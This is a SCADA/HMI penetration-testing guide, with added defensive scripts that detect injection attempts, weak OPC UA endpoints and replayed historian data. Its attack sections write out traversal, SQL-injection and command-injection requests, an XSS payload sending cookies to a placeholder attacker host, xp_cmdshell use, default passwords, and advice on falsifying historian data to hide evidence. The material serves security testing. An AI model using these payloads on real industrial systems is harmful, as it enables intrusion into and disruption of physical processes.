SCADA/HMI Security

Exploitation

SCADA servers and HMI systems are the "brain" of industrial operations. Compromising these systems provides visibility into operations and often control over field devices.

SCADA Architecture

SCADA Components

  • MTU - Master Terminal Unit (central server)
  • RTU - Remote Terminal Unit (field device)
  • HMI - Human Machine Interface
  • Historian - Data archive
  • OPC Server - Protocol translator

Common SCADA Software

  • Wonderware (AVEVA)
  • FactoryTalk (Rockwell)
  • WinCC (Siemens)
  • Ignition (Inductive Automation)
  • ClearSCADA (Schneider)

HMI Vulnerabilities

Web-Based HMI Attacks

Modern HMIs often include web interfaces for remote monitoring. These are vulnerable to traditional web application attacks.

```bash
# Common web vulnerabilities in HMI systems

# Default credentials
# Many HMI web interfaces have hardcoded or default passwords
admin:admin
administrator:password
user:user
operator:operator

# Directory traversal
curl "http://hmi.local/api/file?path=../../../etc/passwd"
curl "http://hmi.local/download?file=....//....//windows/system32/config/sam"

# SQL Injection
# Alarm history, event logs often use SQL backend
curl "http://hmi.local/alarms?start=2024-01-01' OR '1'='1"

# Command injection
# Diagnostic pages often execute system commands
curl "http://hmi.local/ping?host=127.0.0.1;id"

# XSS in alarm messages
# Alarm text displayed to operators may not be sanitized
<script>document.location='http://attacker/steal?c='+document.cookie</script>
```
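The defender-side counterpart to the list above: an added example (not from the original page) that scans HMI web-server access-log lines for the traversal, SQL-injection, command-injection and XSS patterns just described, decoding values first so that `%27` quotes and the `....//` variant are not missed. The log lines, paths and IP addresses are constructed for the example and refer to no real system.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache combined-style) from an HMI web
# interface. The request targets mirror the attack patterns listed above;
# none of these lines come from a real system.
SAMPLE_LOG = """\
10.0.5.7 - - [12/Mar/2024:08:01:12 +0000] "GET /trend?tag=FIC101 HTTP/1.1" 200 512
10.0.5.9 - - [12/Mar/2024:08:02:40 +0000] "GET /api/file?path=../../../etc/passwd HTTP/1.1" 200 1877
10.0.5.9 - - [12/Mar/2024:08:02:41 +0000] "GET /download?file=....//....//windows/system32/config/sam HTTP/1.1" 404 0
10.0.5.9 - - [12/Mar/2024:08:03:05 +0000] "GET /alarms?start=2024-01-01%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 233
10.0.5.9 - - [12/Mar/2024:08:03:30 +0000] "GET /ping?host=127.0.0.1%3Bid HTTP/1.1" 200 90
10.0.5.9 - - [12/Mar/2024:08:03:52 +0000] "GET /alarms/ack?msg=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 77
10.0.5.7 - - [12/Mar/2024:08:04:00 +0000] "GET /alarms?start=2024-01-01 HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# One pattern per attack class. Matching happens on decoded values, so
# "....//" (which still contains "../") and %27-encoded quotes are caught.
CHECKS = {
    "path-traversal":    re.compile(r"\.\./|\.\.\\"),
    "sql-injection":     re.compile(r"(?i)'\s*(?:or|and)\s*'?\w+'?\s*=|\bunion\s+select\b|--\s|/\*"),
    "command-injection": re.compile(r"[;|&`]|\$\("),
    "xss":               re.compile(r"(?i)<\s*/?\s*script|javascript:|\bon(?:error|load|click|mouseover)\s*="),
}

def decode(value: str) -> str:
    # Decode twice so double-encoded payloads (%2527 -> %27 -> ') are visible too.
    return unquote(unquote(value))

def classify_request(target: str) -> list:
    """Return the sorted attack classes whose pattern matches the path or any query value."""
    parts = urlsplit(target)
    values = [decode(parts.path)] + [decode(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    return sorted(name for name, rx in CHECKS.items() if any(rx.search(v) for v in values))

def scan_log(text: str) -> list:
    """Return (client_ip, target, status, findings) for every suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m["target"])
        if findings:
            alerts.append((m["ip"], m["target"], m["status"], findings))
    return alerts
```

Running `scan_log(SAMPLE_LOG)` flags the five hostile requests from 10.0.5.9 and leaves the two legitimate ones from 10.0.5.7 alone.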

Desktop HMI Attacks

```bash
# Traditional HMI applications (Windows-based)

# 1. Outdated Windows systems
# Many HMI stations run Windows 7, XP, or even 2000
# Check for unpatched vulnerabilities
nmap -sV --script vuln 192.168.100.50

# 2. Privilege escalation
# HMI operators often run as local admin
# Look for privilege escalation vectors

# 3. DLL hijacking
# HMI applications may load DLLs from insecure locations
# Place malicious DLL in search path

# 4. Configuration file manipulation
# HMI configs often stored in plain text
# May contain database credentials, server addresses

# 5. Project file manipulation
# Wonderware (.aaPKG)
# FactoryTalk (.ACD)
# WinCC (.zp)
# These can contain credentials and server configs
```

SCADA Server Attacks

Database Exploitation

```bash
# SCADA systems use databases for:
# - Configuration storage
# - Alarm history
# - Trending data
# - User accounts

# Common databases:
# - Microsoft SQL Server
# - Oracle
# - PostgreSQL
# - Proprietary (Historian databases)

# Check for SQL Server
nmap -p 1433 --script ms-sql-info 192.168.100.10

# Default SCADA database credentials
# Wonderware: aaAdmin/wwAdmin
# FactoryTalk: often uses Windows auth
# Ignition: check gateway config

# SQL Server exploitation
# If sa account has weak password
sqsh -S 192.168.100.10 -U sa -P password
> xp_cmdshell 'whoami'

# Extract configuration data
# User tables, tag databases, communication configs
```

OPC Server Exploitation

```bash
# OPC (OLE for Process Control) servers bridge HMI to PLCs
# OPC DA (classic) - DCOM-based
# OPC UA - Modern, TCP-based

# OPC UA enumeration
# The "opcua" package (python-opcua) provides the opcua module imported below;
# "opcua-client" is the separate GUI front-end built on top of it.
pip install opcua

python3 << 'EOF'
from opcua import Client

client = Client("opc.tcp://192.168.100.10:4840")
try:
    client.connect()

    # Browse the address space, starting at the Objects folder
    root = client.get_root_node()
    objects = root.get_child(["0:Objects"])

    def browse(node, depth=0):
        for child in node.get_children():
            print(" " * depth + str(child.get_browse_name()))
            browse(child, depth + 2)

    browse(objects)

finally:
    client.disconnect()
EOF

# Check for anonymous access
# Many OPC UA servers allow anonymous connections

# OPC DA requires DCOM access
# Often can be accessed if on same Windows domain
# Use tools like OPC Expert, MatrikonOPC Explorer
```
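"Check for anonymous access" can be made concrete against what a server advertises. This added example (not part of the original page) assesses OPC UA endpoint descriptions for a None security policy, a channel without encryption, deprecated SHA-1 policies, anonymous user tokens, and UserName tokens whose password would cross a None channel in cleartext. The endpoint dicts are constructed stand-ins for the EndpointDescription objects returned by `client.get_endpoints()` in the opcua library; the field names and enum values follow the OPC UA Part 4 structures.

```python
# Enumerations from OPC UA Part 4 (MessageSecurityMode, UserTokenType).
SECURITY_MODE = {0: "Invalid", 1: "None", 2: "Sign", 3: "SignAndEncrypt"}
TOKEN_TYPE = {0: "Anonymous", 1: "UserName", 2: "Certificate", 3: "IssuedToken"}
POLICY_PREFIX = "http://opcfoundation.org/UA/SecurityPolicy#"
DEPRECATED_POLICIES = {"Basic128Rsa15", "Basic256"}   # SHA-1 based, deprecated since spec 1.04

# Constructed endpoint descriptions standing in for client.get_endpoints();
# field names follow the EndpointDescription / UserTokenPolicy structures.
CONSTRUCTED_ENDPOINTS = [
    {"EndpointUrl": "opc.tcp://192.168.100.10:4840", "SecurityPolicyUri": POLICY_PREFIX + "None",
     "SecurityMode": 1, "UserIdentityTokens": [
         {"PolicyId": "anonymous", "TokenType": 0, "SecurityPolicyUri": None},
         {"PolicyId": "username", "TokenType": 1, "SecurityPolicyUri": None}]},
    {"EndpointUrl": "opc.tcp://192.168.100.10:4840", "SecurityPolicyUri": POLICY_PREFIX + "Basic256",
     "SecurityMode": 2, "UserIdentityTokens": [
         {"PolicyId": "username", "TokenType": 1, "SecurityPolicyUri": None}]},
    {"EndpointUrl": "opc.tcp://192.168.100.10:4840", "SecurityPolicyUri": POLICY_PREFIX + "Basic256Sha256",
     "SecurityMode": 3, "UserIdentityTokens": [
         {"PolicyId": "username", "TokenType": 1, "SecurityPolicyUri": None},
         {"PolicyId": "certificate", "TokenType": 2, "SecurityPolicyUri": None}]},
]

def policy_name(uri):
    # ".../SecurityPolicy#Basic256" -> "Basic256"; a missing URI counts as "None"
    return uri.split("#", 1)[1] if uri and "#" in uri else "None"

def assess_endpoint(ep):
    """Return the weaknesses of one endpoint description (empty list = acceptable)."""
    issues = []
    policy = policy_name(ep["SecurityPolicyUri"])
    mode = SECURITY_MODE.get(ep["SecurityMode"], "Invalid")
    if policy == "None" or mode == "None":
        issues.append("channel is neither signed nor encrypted")
    elif mode == "Sign":
        issues.append("channel is signed but not encrypted")
    if policy in DEPRECATED_POLICIES:
        issues.append(f"deprecated SHA-1 policy {policy}")
    for tok in ep["UserIdentityTokens"]:
        kind = TOKEN_TYPE.get(tok["TokenType"], "Unknown")
        if kind == "Anonymous":
            issues.append(f"anonymous login allowed (PolicyId {tok['PolicyId']})")
        # A UserName token is encrypted with its own SecurityPolicyUri, or with the
        # endpoint's policy when it has none; if that is None the password is cleartext.
        if kind == "UserName" and policy_name(tok["SecurityPolicyUri"] or ep["SecurityPolicyUri"]) == "None":
            issues.append(f"password sent in cleartext (PolicyId {tok['PolicyId']})")
    return issues

def assess_endpoints(endpoints):
    """Map 'url policy/mode' -> issue list for every advertised endpoint."""
    return {f"{ep['EndpointUrl']} {policy_name(ep['SecurityPolicyUri'])}/{SECURITY_MODE[ep['SecurityMode']]}":
            assess_endpoint(ep) for ep in endpoints}
```

A hardened server advertises only endpoints whose issue list comes back empty; the first constructed endpoint, with None/None and an anonymous token, is the configuration the comment above warns about.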

Historian Exploitation

Historians store time-series data from SCADA systems. They often contain years of operational data and may have weak access controls.

```bash
# Common Historians:
# - OSIsoft PI (now AVEVA)
# - Wonderware Historian
# - GE Proficy Historian
# - Honeywell PHD
# - AspenTech IP.21

# OSIsoft PI - Default ports
# 5450 - PI Data Archive
# 5457 - PI AF Server
# 5459 - PI Buffering

# Check for PI Server
nmap -p 5450,5457,5459 192.168.100.20

# PI SDK exploitation
# If you can install PI SDK on attack machine:
# - Query historical data
# - Potentially write false data
# - Extract process knowledge

# Historian data value:
# - Learn normal process behavior
# - Identify when to attack (off-hours, maintenance)
# - Understand process limits
# - Historical attacks: manipulate data to hide evidence
```
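Two common signatures of a falsified historian feed are a stuck value (the tag stops changing) and a stretch of samples that exactly repeats earlier data (a replay). This added example (not from the original page) detects both over a time series for a single tag; the series is constructed with a fixed seed, and the window and run-length thresholds are assumptions to tune per tag.

```python
import random

def constructed_series():
    """Constructed historian samples for one tag at a fixed 1 s interval:
    40 genuine noisy readings, then a 6-sample replay of an earlier stretch,
    then a 10-sample replay of another stretch, then 8 identical readings."""
    rng = random.Random(7)                       # fixed seed: deterministic data
    base = [rng.uniform(48.0, 52.0) for _ in range(40)]
    return base + base[5:11] + base[20:30] + [52.4] * 8

def find_flatlines(values, min_run=5):
    """Return (start, end) index pairs where the value stops changing for min_run+ samples."""
    runs, start = [], 0
    for i in range(1, len(values) + 1):
        if i == len(values) or values[i] != values[start]:
            if i - start >= min_run:
                runs.append((start, i - 1))
            start = i
    return runs

def find_replays(values, window=4):
    """Find stretches that exactly repeat an earlier stretch of the same tag.
    Every sliding window of `window` samples is remembered; a window seen before
    is a replay candidate, and adjacent candidates copied from the same source
    offset are merged into one segment. All-identical windows are left to
    find_flatlines so a flatline is not reported twice."""
    first_seen, segments = {}, []
    for j in range(len(values) - window + 1):
        key = tuple(values[j:j + window])
        if len(set(key)) == 1:
            continue
        if key in first_seen:
            i = first_seen[key]
            offset = j - i
            last = segments[-1] if segments else None
            if last and last["offset"] == offset and j <= last["end"] + 1:
                last["end"] = j + window - 1
            else:
                segments.append({"start": j, "end": j + window - 1, "source": i, "offset": offset})
        else:
            first_seen[key] = j
    return segments
```

On the constructed series this reports one flatline at samples 56..63 and two replayed segments, 40..45 copied from sample 5 onward and 46..55 copied from sample 20 onward.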

Engineering Workstation Attacks

```bash
# Engineering workstations have:
# - PLC programming software
# - Network diagrams
# - Project backups
# - Credentials for all systems

# Valuable files to extract:
# Siemens: *.ap1*, *.s7p, *.zap* (TIA Portal projects)
# Allen-Bradley: *.ACD (Studio 5000 projects)
# Schneider: *.STU, *.XEF (Unity projects)

# Search for project files (Windows cmd.exe syntax, run on the workstation itself)
dir /s /b *.acd *.ap* *.s7p *.stu

# Project files may contain:
# - PLC IP addresses
# - Passwords (sometimes encrypted, sometimes not)
# - Complete PLC logic
# - Network architecture

# Programming software often runs as admin
# Pivot through engineering WS to PLCs
```

Protocol Gateway Attacks

```bash
# Protocol gateways/converters translate between protocols
# Example: Modbus to EtherNet/IP

# Often have:
# - Web interfaces for configuration
# - Telnet/SSH access
# - Default credentials

# Common gateways:
# - Moxa devices
# - Red Lion
# - Anybus
# - HMS Networks

# Moxa default credentials
admin:admin
admin:moxa

# Gateway attacks:
# 1. Reconfigure routing
# 2. Man-in-the-middle ICS traffic
# 3. Block communication (DoS)
# 4. Inject false data

# Many gateways run embedded Linux
# Standard embedded device attacks apply
```

Common HMI/SCADA CVEs

| CVE | Product | Vulnerability |
|---|---|---|
| CVE-2022-2003 | Aveva InTouch | Path Traversal |
| CVE-2020-25159 | Ignition Gateway | Auth Bypass |
| CVE-2019-10915 | Siemens WinCC | SQL Injection |
| CVE-2021-22779 | Schneider Modicon | Authentication Bypass |

SCADA/HMI Testing Checklist

HMI Systems

  • ☐ Test web interfaces for OWASP vulnerabilities
  • ☐ Check for default credentials
  • ☐ Test local privilege escalation
  • ☐ Analyze project/config files

SCADA Servers

  • ☐ Database security assessment
  • ☐ OPC server access testing
  • ☐ Check for known CVEs
  • ☐ Test inter-process communications

Historians

  • ☐ Test authentication
  • ☐ Check for anonymous access
  • ☐ Assess data integrity controls
  • ☐ Test for data manipulation capabilities

Operator Impact

When testing HMI systems, consider the impact on operators. A crashed HMI means operators lose visibility into the process. Always have a rollback plan and test during planned downtime.